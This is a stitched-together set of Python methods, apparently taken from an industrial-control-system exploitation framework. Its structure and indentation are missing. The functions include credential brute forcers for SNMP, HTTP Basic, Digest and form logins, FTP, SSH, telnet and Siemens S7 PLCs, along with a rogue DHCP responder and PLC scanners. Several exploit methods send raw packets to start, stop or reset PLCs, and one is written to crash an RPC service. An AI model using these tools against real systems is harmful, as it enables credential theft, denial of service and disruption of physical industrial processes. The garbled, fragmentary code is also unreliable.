def run(self):
if self._check_alive():
print_success("Target is alive")
print_status("Sending packet to target")
self.exploit()
else:
print_error("Target is not alive")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
cmdGen = cmdgen.CommandGenerator()
while running.is_set():
try:
string = data.next().strip()
errorIndication, errorStatus, errorIndex, varBinds = cmdGen.getCmd(
cmdgen.CommunityData(string, mpModel=self.version - 1),
cmdgen.UdpTransportTarget((self.target, self.port)),
'1.3.6.1.2.1.1.1.0',
)
if errorIndication or errorStatus:
print_error(
"Target: {}:{} {}: Invalid community string - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Valid community string found - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Basic Auth")
return
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = itertools.product(usernames, passwords)
with threads.ThreadPoolExecutor(self.threads) as executor:
for record in collection:
executor.submit(self.target_function, url, record)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def run(self):
conf.verb = self.verbose
self.sniff_mac_address = get_if_hwaddr(self.nic)
self.scan_target_ip(self.target)
if len(self.result) == 0:
print_error("Didn't find any device, please check target mac address.")
return
print_status("Please make sure target device info is correct.")
print_status("Do you want setup target with\n ip address: %s\n network mask: %s\n gateway:%s\n" % (
self.target_ip, self.target_netmask, self.target_gateway
))
ans = raw_input("Y/y to confirm, other to cancel.\n:")
if ans.upper() == "Y":
self.exploit(target_mac=self.target)
self.scan_target_ip(self.target)
# TODO: need some other method to check setup is success or not.
if len(self.result) == 0:
print_error("Setup target ip failed.")
return
if self.result[0][3] != self.target_ip \
or self.result[0][4] != self.target_netmask \
or self.result[0][5] != self.target_gateway:
print_error("Setup target ip failed.")
return
else:
print_success("Setup target ip succeeded")
def get_target_info(self, host, port):
for rack_num in range(self.min_rack, self.max_rack + 1):
for slot_num in range(self.min_slot, self.max_slot + 1):
print_status("Tring to scan %s with Rack%s/Slot%s" %
(host, rack_num, slot_num))
order_code = ''
firmware_version = ''
module_type_name = ''
module_name = ''
serial_number = ''
ip_address = host
try:
target = S7Client(name='S7Scanner',
ip=host,
port=port,
rack=rack_num,
slot=slot_num)
target.connect()
order_code, firmware_version, module_type_name, \
as_name, module_name, serial_number = target.get_target_info()
ip_address = host
if order_code != '':
self.result.append([
order_code, module_type_name, firmware_version,
module_name, serial_number,
str(rack_num) + '/' + str(slot_num), ip_address
])
except Exception as err:
print_error(err)
return False
def attack(self):
url = "{}:{}{}".format(self.target, self.port, self.path)
response = http_request("GET", url)
if response is None:
return
if response.status_code != 401:
print_status("Target is not protected by Digest Auth")
return
if self.defaults.startswith('file://'):
defaults = open(self.defaults[7:], 'r')
else:
defaults = [self.defaults]
with ThreadPoolExecutor(self.threads) as executor:
for record in defaults:
username, password = record.split(':')
executor.submit(self.target_function, url, username, password)
if self.credentials:
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
defaults.close()
def get_target_info(self, host, port):
product_name = ''
device_type = ''
vendor = ''
revision = ''
serial_number = ''
slot = ''
ip_address = host
target = CIPClient(name='CIP_Scanner', ip=host, port=port)
target.connect()
for slot_num in range(self.max_slot + 1):
print_status("Tring to scan %s with Slot%s" % (host, slot_num))
try:
product_name, device_type, vendor, revision, serial_number = \
target.get_target_info(port_segment=slot_num)
print(product_name, device_type, vendor, revision,
serial_number)
slot = slot_num
ip_address = host
if serial_number != '':
self.result.append([
product_name, device_type, vendor, revision,
serial_number,
str(slot), ip_address
])
except Exception as err:
print_error(err)
return False
def detect_dhcp(self, pkt):
# If DHCP Discover then DHCP Offer
if pkt[DHCP] and pkt[DHCP].options[0][1] == 1:
print_status("DHCP Discover packet detected with mac address:%s" %
pkt.src)
client_ip = self.chose_ip_to_offer(pkt.src)
if client_ip:
packet = Ether(src=self.server_mac, dst="ff:ff:ff:ff:ff:ff") / \
IP(src=self.dhcp_server_ip, dst="255.255.255.255") / \
UDP(sport=67, dport=68) / \
BOOTP(
op=2,
yiaddr=client_ip,
siaddr=self.client_gateway,
# giaddr=server_ip,
chaddr=pkt.src,
xid=pkt[BOOTP].xid,
sname='DHCPServer'
) / \
DHCP(options=[('message-type', 'offer')]) / \
DHCP(options=[('subnet_mask', self.client_net_mask)]) / \
DHCP(options=[('name_server', self.client_dns)]) / \
DHCP(options=[('server_id', self.dhcp_server_ip), ('end')])
sendp(packet, iface=self.nic)
print_success("DHCP Offer packet sent.")
print_success(
"DHCP Offer to target:%s\nIP:%s\nNetMask:%s\nGateWay:%s\nDNS:%s.\n"
% (pkt.src, client_ip, self.client_net_mask,
self.client_gateway, self.client_dns))
# If DHCP Request then DHCP Ack
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
print_status("DHCP Request packet detected with mac address:%s" %
pkt.src)
client_ip = self.chose_ip_to_offer(pkt.src)
if client_ip:
packet = Ether(src=self.server_mac, dst=pkt.src) / \
IP(src=self.dhcp_server_ip, dst=client_ip) / \
UDP(sport=67, dport=68) / \
BOOTP(op=2,
yiaddr=client_ip,
siaddr=self.dhcp_server_ip,
giaddr=self.client_gateway,
chaddr=pkt.src,
xid=pkt[BOOTP].xid
) / \
DHCP(options=[('message-type', 'ack')]) / \
DHCP(options=[('subnet_mask', self.client_net_mask)]) / \
DHCP(options=[('name_server', self.client_dns)]) / \
DHCP(options=[('server_id', self.dhcp_server_ip), ('end')])
sendp(packet, iface=self.nic)
print_success(
"DHCP Ack to target:%s\nIP:%s\nNetMask:%s\nGateWay:%s\nDNS:%s."
% (pkt.src, client_ip, self.client_net_mask,
self.client_gateway, self.client_dns))
print_success("DHCP Ack packet sent\n\nCtrl+C to exit\n")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'process is starting...', verbose=module_verbosity)
ftp = ftplib.FTP()
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
ftp.connect(self.target,
port=int(self.port),
timeout=10)
break
except (socket.error, socket.timeout):
print_error(
"{} Connection problem. Retrying...".format(name),
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
try:
ftp.login(user, password)
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
except:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
ftp.close()
print_status(name, 'process is terminated.', verbose=module_verbosity)
def attack(self):
url = sanitize_url("{}:{}{}".format(self.target, self.port,
self.get_form_path()))
try:
requests.get(url, verify=False)
except (requests.exceptions.MissingSchema,
requests.exceptions.InvalidSchema):
print_error("Invalid URL format: %s" % url)
return
except requests.exceptions.ConnectionError:
print_error("Connection error: %s" % url)
return
# authentication type
if self.form == 'auto':
form_data = self.detect_form()
if form_data is None:
print_error("Could not detect form")
return
(form_action, self.data) = form_data
if form_action:
self.path = form_action
else:
self.data = self.form
print_status("Using following data: ", self.data)
# invalid authentication
self.invalid_auth()
# running threads
if self.usernames.startswith('file://'):
usernames = open(self.usernames[7:], 'r')
else:
usernames = [self.usernames]
if self.passwords.startswith('file://'):
passwords = open(self.passwords[7:], 'r')
else:
passwords = [self.passwords]
collection = LockedIterator(itertools.product(usernames, passwords))
self.run_threads(self.threads, self.target_function, collection)
if len(self.credentials):
print_success("Credentials found!")
headers = ("Target", "Port", "Login", "Password")
print_table(headers, *self.credentials)
else:
print_error("Credentials not found")
def exploit(self):
self.sock = socket.socket()
self.sock.connect((self.target, self.port))
self.create_connect(self.slot)
if self.command == 1:
print_status("Start plc")
self.sock.send(cpu_start_payload)
elif self.command == 2:
print_status("Stop plc")
self.sock.send(cpu_stop_payload)
else:
print_error("Command %s didn't support" % self.command)
def run(self):
if self._check_alive():
print_success("RPC port is open")
print_status("Sending packet to target")
self.exploit()
time.sleep(3) # wait target crash
if not self._check_alive():
print_success("Target is down")
else:
print_error("Target is not vulnerable")
else:
print_error("Target is not vulnerable")
return
def exploit(self):
self.sock = socket.socket()
self.sock.settimeout(3)
self.sock.connect((self.target, self.port))
if self.get_session():
if self.command == 1:
print_status("Start plc")
buff = ('015300000006005a' + self.session + '40ff00').decode('hex')
self.sock.send(buff)
elif self.command == 2:
print_status("Stop plc")
buff = ('015800000006005a' + self.session + '41ff00').decode('hex')
self.sock.send(buff)
else:
print_error("Command %s didn't support" % self.command)
else:
print_error("Can't get session, stop exploit.")
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
url = sanitize_url("{}:{}{}".format(self.target, self.port, self.path))
headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
postdata = self.data.replace("{{USER}}", user).replace(
"{{PASS}}", password)
r = requests.post(url,
headers=headers,
data=postdata,
verify=False)
l = len(r.text)
if l < self.invalid["min"] or l > self.invalid["max"]:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
else:
print_error(
name,
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'process is terminated.', verbose=module_verbosity)
def scan(self, protocol):
nm = nmap.PortScanner()
try:
if protocol == "tcp" or protocol == "TCP":
nm.scan(hosts=self.target,
ports=str(self.port),
arguments='-n -sT ')
return nm
elif protocol == "udp" or protocol == "UDP":
print_status(
"UDP Scan requires root privileges will using sudo to scan target "
)
nm.scan(hosts=self.target,
ports=str(self.port),
arguments='-n -sU ',
sudo=True)
return nm
except Exception as err:
print_error(err)
return None
def target_function(self, running, data):
module_verbosity = boolify(self.verbose)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
s7_client = S7Client(name="Siemens PLC",
ip=self.target,
rack=self.rack,
slot=self.slot)
s7_client.connect()
if not module_verbosity:
s7_client.logger.setLevel(50)
while running.is_set():
try:
string = data.next().strip()
if len(string) > 8:
continue
s7_client.check_privilege()
if s7_client.protect_level == 1:
print_error("Target didn't set password.")
return
s7_client.auth(string)
if s7_client.authorized:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Valid password string found - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
self.strings.append((self.target, self.port, string))
else:
print_error(
"Target: {}:{} {}: Invalid community string - String: '{}'"
.format(self.target, self.port, name, string),
verbose=module_verbosity)
except StopIteration:
break
print_status(name, 'thread is terminated.', verbose=module_verbosity)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
print_status(name, 'process is starting...', verbose=module_verbosity)
while running.is_set():
try:
line = data.next().split(":")
user = line[0].strip()
password = line[1].strip()
ssh.connect(self.target,
int(self.port),
timeout=5,
username=user,
password=password)
except StopIteration:
break
except paramiko.ssh_exception.SSHException as err:
ssh.close()
print_error(
"Target: {}:{} {}: {} Username: '******' Password: '******'".
format(self.target, self.port, name, err, user, password),
verbose=module_verbosity)
else:
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {} Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user, password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
print_status(name, 'process is terminated.', verbose=module_verbosity)
def exploit(self):
if self.command == 0:
print_status("Start plc")
self.start_ctrl(start_cpu_packet)
elif self.command == 1:
print_status("Stop plc")
self.start_ctrl(stop_cpu_packet)
elif self.command == 2:
print_status("reset plc")
self.start_ctrl(stop_cpu_packet)
time.sleep(0.5)
self.start_ctrl(reset_cpu_packet)
elif self.command == 3:
print_status("reset plc and ip")
self.start_ctrl(stop_cpu_packet)
time.sleep(0.5)
self.start_ctrl(reset_cpu_and_ip_packet)
else:
print_error("Command %s didn't support" % self.command)
def target_function(self, running, data):
module_verbosity = boolify(self.verbosity)
name = threading.current_thread().name
print_status(name, 'thread is starting...', verbose=module_verbosity)
while running.is_set():
try:
user, password = data.next()
user = user.strip()
password = password.strip()
except StopIteration:
break
else:
retries = 0
while retries < 3:
try:
tn = telnetlib.Telnet(self.target, self.port)
tn.expect(["Login: "******"login: "******"\r\n")
tn.expect(["Password: "******"password"], 5)
tn.write(password + "\r\n")
tn.write("\r\n")
(i, obj, res) = tn.expect(["Incorrect", "incorrect"],
5)
tn.close()
if i != -1:
print_error(
"Target: {}:{} {}: Authentication Failed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user,
password),
verbose=module_verbosity)
else:
if any(map(lambda x: x in res, [
"#", "$", ">"
])) or len(res) > 500: # big banner e.g. mikrotik
if boolify(self.stop_on_success):
running.clear()
print_success(
"Target: {}:{} {}: Authentication Succeed - Username: '******' Password: '******'"
.format(self.target, self.port, name, user,
password),
verbose=module_verbosity)
self.credentials.append(
(self.target, self.port, user, password))
tn.close()
break
except EOFError:
print_error(name,
"Connection problem. Retrying...",
verbose=module_verbosity)
retries += 1
if retries > 2:
print_error(
"Too much connection problems. Quiting...",
verbose=module_verbosity)
return
continue
print_status(name, 'thread is terminated.', verbose=module_verbosity)
